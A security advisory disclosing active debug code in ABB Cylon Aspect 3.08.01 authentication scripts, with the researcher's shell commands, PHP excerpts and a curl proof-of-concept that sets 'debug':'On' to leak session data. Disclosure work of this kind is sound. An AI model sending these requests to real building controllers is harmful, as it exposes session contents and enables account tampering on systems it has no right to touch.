ABB Cylon Aspect 3.08.01 Active Debug Data Exposure

ABB Cylon Aspect 3.08.01 (auth/) Active Debug Code Vulnerability

Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: 3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller is deployed to unauthorized actors with debugging
code still enabled or active, which can create unintended entry points or expose
sensitive information.

Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2024-5851
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5851.php
CWE ID: 489
CWE URL: https://cwe.mitre.org/data/definitions/489.html

21.04.2024

$ cat project

P R O J E C T

.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ ./db_list.sh ../
[*] DEBUG enabled for:
/htmlroot/auth/changePassword.php
/htmlroot/auth/checkPassword.php
/htmlroot/auth/passwordRules.php
/htmlroot/auth/sessionCreate.php
/htmlroot/auth/sessionLogout.php
/htmlroot/auth/sessionValidate.php
$ head -n 12 auth/changePassword.php | cat -n

1 <?php
2 $post = (empty($_POST)) ? json_decode(file_get_contents(‘php://input’), true) : $_POST;
3
4 $debug = (isset($post[‘debug’]) && $post[‘debug’] === ‘On’);
5
6 if ($debug) {
7 ini_set(‘display_startup_errors’, 1);
8 ini_set(‘display_errors’, 1);
9 error_reporting(-1);
10 }
11
12 session_start();
$ cat auth/changePassword.php | grep 84
84 if (debug) $data->_SESSION = $_SESSION;
$ grep -irnHE “debug)|debug )” auth/*.php
auth/changePassword.php:6:if ($debug) {
auth/changePassword.php:84:if ($debug) $data->_SESSION = $_SESSION;
auth/checkPassword.php:6:if ($debug) {
auth/checkPassword.php:54:if ($debug) $data->_SESSION = $_SESSION;
auth/passwordRules.php:6:if ($debug) {
auth/passwordRules.php:36:if ($debug) $data->_SESSION = $_SESSION;
auth/sessionCreate.php:6:if ($debug) {
auth/sessionCreate.php:57:if ($debug) $data->_SESSION = $_SESSION;
auth/sessionLogout.php:6:if ($debug) {
auth/sessionLogout.php:31:if( $debug ) $data->_SESSION = $_SESSION;
auth/sessionValidate.php:6:if ($debug) {
auth/sessionValidate.php:45:if( $debug ) $data->_SESSION = $_SESSION;

$ curl -X POST “http://192.168.73.31/auth/changePassword.php” \
> -d “{\
> \”appid\”:\”1\”,\
> \”user\”:\”teppei\”,\
> \”oldpass\”:\”123456\”,\
> \”newpass\”:\”654321\”,\
> \”forcelogout\”:\”?\”,\
> \”debug\”:\”On\”\
> }”

نوشته های مشابه